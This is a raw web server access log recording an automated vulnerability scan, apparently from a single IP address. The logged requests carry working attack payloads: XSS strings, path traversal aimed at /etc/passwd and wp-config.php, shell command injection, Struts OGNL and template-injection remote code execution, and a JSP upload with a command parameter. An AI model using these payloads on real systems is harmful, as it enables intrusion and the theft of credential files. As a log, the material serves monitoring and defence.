195.164.49.69 - - [20/Oct/2024:18:01:10 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:10 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:10 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:16 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:19 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:20 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:20 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:21 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:01:35 +0000] GET /threaddump HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:18:01:37 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:18:01:39 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:01:41 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:01:43 +0000] GET /index_sso.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:01:45 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
127.0.0.1 - - [20/Oct/2024:18:01:46 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:01:48 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [20/Oct/2024:18:01:50 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:01:52 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
- - - [20/Oct/2024:18:01:54 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:01:56 +0000] GET /s/2niA4ET25ZREv9kZOzGvptl5Fy3/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
- - - [20/Oct/2024:18:01:58 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:02:00 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:02:02 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:02:04 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:18:02:06 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:18:02:08 +0000] GET /passwordrecovered.cgi?id=YvUqf HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:02:10 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:02:12 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:02:14 +0000] GET /SetupWizard.aspx/trdKNEizJQ HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:02:16 +0000] GET /www/setup.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:02:17 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:18:02:19 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:18:02:21 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:18:02:23 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:18:02:25 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
83.212.98.101 - - [20/Oct/2024:18:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:02:27 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:18:02:29 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:02:30 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:02:32 +0000] GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:18:02:34 +0000] GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:18:02:36 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:18:02:38 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:02:40 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:02:41 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:02:43 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:18:02:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:02:51 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:02:52 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:02:54 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:02:56 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:02:58 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:03:00 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:03:02 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
- - - [20/Oct/2024:18:03:04 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:03:06 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:18:03:08 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:18:03:09 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:03:11 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:03:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:03:15 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:03:17 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:03:19 +0000] GET /.sh_history HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:18:03:21 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:03:23 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:03:25 +0000] GET /?pretty HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:03:26 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:03:28 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:03:30 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:03:32 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:03:33 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:03:35 +0000] GET /actuators/logfile HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:03:39 +0000] GET /mifs/aad/api/v2/admins/users HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:18:03:41 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:18:03:43 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:03:45 +0000] GET /env HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:18:03:47 +0000] GET /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:18:03:48 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:03:50 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:18:03:52 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
195.164.49.69 - - [20/Oct/2024:18:03:54 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:18:03:56 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:03:58 +0000] GET /setup.php HTTP/1.1 404 1083
- - - [20/Oct/2024:18:03:59 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:04:01 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:04:03 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:18:04:05 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:18:04:11 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:04:13 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:04:15 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:04:17 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:04:21 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:04:24 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:04:27 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:04:29 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/l6T8.css HTTP/1.1 404 1178
195.164.49.69 - - [20/Oct/2024:18:04:30 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/WFsN.css HTTP/1.1 404 1191
195.164.49.69 - - [20/Oct/2024:18:04:32 +0000] GET /trace HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:18:04:34 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:18:04:36 +0000] GET /web.config.i18n.ashx?l=qnsip&v=qnsip HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:04:38 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=qnsip&v=qnsip HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:04:40 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:04:42 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:18:04:43 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:04:45 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:18:04:48 +0000] POST /scripts/setup.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:05:10 +0000] GET /reports/rwservlet/showenv HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:18:05:12 +0000] GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1 404 1095
- - - [20/Oct/2024:18:05:40 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:05:43 +0000] GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [20/Oct/2024:18:05:43 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:18:05:43 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:18:05:44 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [20/Oct/2024:18:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:05:49 +0000] GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [20/Oct/2024:18:05:49 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:18:05:49 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:05:49 +0000] GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:06:12 +0000] POST /website/blog/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:06:14 +0000] POST /_search HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:06:36 +0000] POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:18:06:59 +0000] PUT /poc.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:18:07:01 +0000] GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1081
83.212.98.101 - - [20/Oct/2024:18:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:07:53 +0000] GET /cgi-bin/kvm?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:07:54 +0000] GET /cgi-bin/admin?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:07:54 +0000] GET /cgi-bin/apply?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:07:54 +0000] GET /cgi-bin/non-CA-rev?LD_DEBUG=help HTTP/1.1 404 1096
